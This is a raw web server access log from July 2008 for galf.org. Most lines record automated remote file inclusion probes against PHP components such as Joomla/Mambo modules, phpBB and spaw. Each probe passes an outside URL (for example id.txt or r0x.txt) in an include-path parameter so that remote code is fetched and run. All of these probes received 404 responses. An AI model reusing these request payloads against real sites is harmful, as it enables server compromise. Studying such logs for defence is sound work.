216.246.91.250 - - [20/Jul/2008:17:20:32 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:20:32 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:20:32 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:20:35 -0700] "GET /logs/access_071029.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:20:52 -0700] "GET /logs/access_080310.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:20:53 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:20:54 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.19.144.26 - - [20/Jul/2008:17:21:02 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [20/Jul/2008:17:21:03 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [20/Jul/2008:17:21:03 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.2.100.138 - - [20/Jul/2008:17:21:16 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [20/Jul/2008:17:21:17 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [20/Jul/2008:17:21:17 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [20/Jul/2008:17:21:17 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [20/Jul/2008:17:21:18 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [20/Jul/2008:17:21:18 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:21:22 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:21:22 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:21:29 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:21:29 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
83.103.23.40 - - [20/Jul/2008:17:21:35 -0700] "GET /logs/access_080113.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.chonil.co.kr/zboard/lost/motd/01.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.23.40 - - [20/Jul/2008:17:21:36 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.chonil.co.kr/zboard/lost/motd/01.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.78.141 - - [20/Jul/2008:17:21:43 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.246.78.141 - - [20/Jul/2008:17:21:45 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.246.78.141 - - [20/Jul/2008:17:22:14 -0700] "GET /logs/access_070709.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.246.78.141 - - [20/Jul/2008:17:22:15 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.246.91.250 - - [20/Jul/2008:17:22:29 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
212.97.132.101 - - [20/Jul/2008:17:22:32 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
212.97.132.101 - - [20/Jul/2008:17:22:32 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:22:45 -0700] "GET /logs/access_071015.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:22:45 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:22:50 -0700] "GET /logs/access_071014.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:22:56 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:22:56 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.242 - - [20/Jul/2008:17:22:57 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_mambelfish&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:23:12 -0700] "GET /logs/access_080310.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:23:13 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:23:13 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:23:33 -0700] "GET /logs/access_071015.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:23:33 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:23:33 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:23:46 -0700] "GET /logs/access_071014.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:12 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:12 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:15 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:15 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:20 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:21 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:23 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:23 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:25 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:25 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:27 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:24:27 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:24:31 -0700] "GET /logs/access_080630.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:24:31 -0700] "GET /logs/access_080630.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:24:31 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:24:32 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:24:32 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.93 - - [20/Jul/2008:17:24:32 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.48.146 - - [20/Jul/2008:17:24:35 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.48.146 - - [20/Jul/2008:17:24:35 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.48.146 - - [20/Jul/2008:17:24:36 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:25:37 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:25:37 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:25:40 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
217.198.149.178 - - [20/Jul/2008:17:26:12 -0700] "GET /logs/access_080324.log/convert/mvcw.php?step=1&vwar_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
217.198.149.178 - - [20/Jul/2008:17:26:12 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
217.198.149.178 - - [20/Jul/2008:17:26:12 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:26:19 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
194.186.45.242 - - [20/Jul/2008:17:26:21 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:26:25 -0700] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:25 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:25 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:25 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:26 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:26 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:26 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
63.247.139.189 - - [20/Jul/2008:17:26:48 -0700] "GET //_theme/breadcrumb.php?rootBase=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:57 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:57 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:57 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:57 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:57 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:26:57 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:27:00 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:27:00 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:27:00 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:27:00 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:27:00 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:27:00 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:27:03 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:27:03 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
216.120.241.242 - - [20/Jul/2008:17:27:04 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
210.127.253.161 - - [20/Jul/2008:17:27:15 -0700] "GET /logs/access_080630.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:27:15 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:27:16 -0700] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:17:27:48 -0700] "GET /logs/access_080113.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.222.199.148 - - [20/Jul/2008:17:28:12 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:28:33 -0700] "GET /logs/access_080602.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:28:33 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:28:33 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:28:34 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:28:35 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.120.241.242 - - [20/Jul/2008:17:28:37 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.246.31.225 - - [20/Jul/2008:17:28:45 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
86.109.98.97 - - [20/Jul/2008:17:29:18 -0700] "GET /logs/access_080407.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.98.97 - - [20/Jul/2008:17:29:18 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.98.97 - - [20/Jul/2008:17:29:19 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/sourc3rs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.195.37.157 - - [20/Jul/2008:17:29:33 -0700] "GET /logs/access_071001.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
